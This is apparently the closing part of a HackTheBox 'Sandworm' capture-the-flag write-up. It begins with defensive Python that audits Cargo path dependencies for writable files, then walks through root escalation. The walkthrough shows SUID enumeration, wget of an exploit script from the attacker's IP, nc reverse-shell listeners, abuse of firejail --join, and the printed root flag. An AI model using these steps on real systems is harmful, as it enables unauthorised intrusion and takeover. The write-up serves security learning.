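def writable_by_others(crate_dir: Path, trusted_uid: int) -> List[str]:
    """Findings for every entry under crate_dir that someone other than trusted_uid
    could alter: wrong owner, group/world write bit, or a symlink (points anywhere)."""
    findings: List[str] = []
    for p in [crate_dir, *sorted(crate_dir.rglob("*"))]:
        st = p.lstat()
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{p}: symlink inside the source tree")
            continue
        if st.st_uid != trusted_uid:
            findings.append(f"{p}: owned by uid {st.st_uid}, expected {trusted_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{p}: mode {stat.S_IMODE(st.st_mode):04o} is group/world writable")
    return findings


def audit_project(project_dir: Path, trusted_uid: Optional[int] = None) -> Dict[str, List[str]]:
    """Map each path dependency to its findings; an empty list means it is clean.
    trusted_uid defaults to the current user (the account the build is meant to run as)."""
    if trusted_uid is None:
        trusted_uid = os.getuid()
    report: Dict[str, List[str]] = {}
    for name, crate_dir in path_dependencies(project_dir / "Cargo.toml").items():
        if not crate_dir.is_dir():
            report[name] = [f"{crate_dir}: missing (build fails or resolves elsewhere)"]
        else:
            report[name] = writable_by_others(crate_dir, trusted_uid)
    return report


def build_demo(writable: bool = True) -> Path:
    """Construct a tipnet-like project whose logger crate is group-writable (demo only)."""
    root = Path(tempfile.mkdtemp(prefix="tipnet-demo-"))
    src = root / "crates" / "logger" / "src"
    src.mkdir(parents=True)
    (src / "lib.rs").write_text("pub fn log(_user: &str) {}\n")
    os.chmod(src.parent, 0o755)
    os.chmod(src, 0o775 if writable else 0o755)        # drwxrwxr-x: group can replace lib.rs
    os.chmod(src / "lib.rs", 0o664 if writable else 0o644)
    project = root / "tipnet"
    project.mkdir()
    (project / "Cargo.toml").write_text(
        '[package]\nname = "tipnet"\nversion = "0.1.0"\n\n'
        '[dependencies]\nchrono = "0.4"\n'
        f'logger = {{ path = "{root / "crates" / "logger"}" }}\n\n'
        '[dependencies.other]\npath = "../crates/other"\n'
    )
    return project
```

Run `audit_project(Path("/opt/tipnet"), trusted_uid=0)` on a real host to check a root-owned scheduled build; the `.cargo` registry cache of the build user deserves the same review.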

firejail

atlas@sandworm:/opt/tipnet$ find / -perm -4000 -user root 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
/usr/local/bin/firejail
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount3

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

The script above can be used for privilege escalation.

silentobserver@sandworm:/tmp$ wget http://10.10.16.48/exploit.py
--2023-06-29 15:45:08--  http://10.10.16.48/exploit.py
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7955 (7.8K) [text/x-python]
Saving to: ‘exploit.py’

exploit.py                                           100%[===========================================>]   7.77K  40.9KB/s    in 0.2s    

2023-06-29 15:45:10 (40.9 KB/s) - ‘exploit.py’ saved [7955/7955]

silentobserver@sandworm:/tmp$ chmod +x exploit.py

Upload it to /tmp and make it executable.

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 5555 
listening on [any] 5555 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 33806
bash: cannot set terminal process group (1608): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
atlas@sandworm:/opt/tipnet$ cd /tmp
cd /tmp
atlas@sandworm:/tmp$ python3 exploit.py
python3 exploit.py
You can now run 'firejail --join=1776' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Run the script, then open another shell and run the firejail --join=1776 command the script gave us.

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 57828
bash: cannot set terminal process group (1833): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ firejail --join=1776
firejail --join=1776
Warning: cleaning all supplementary groups
changing root to /proc/1776/root
Child process initialized in 9.03 ms
su -
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

Successfully escalated to root.

cat /root/root.txt
e24cdfa390562eed1f0d97513bbf8db4

Root flag obtained.

[Screenshot: Hackthebox - Sandworm]

Originally published on the WeChat public account 路西菲尔的故事汇: Hackthebox - Sandworm

Posted by admin on 2024-01-08 22:47:19
Reposted by CN-SEC中文网 (with thanks to the original author); please keep this link when reposting: https://cn-sec.com/archives/2375563.html
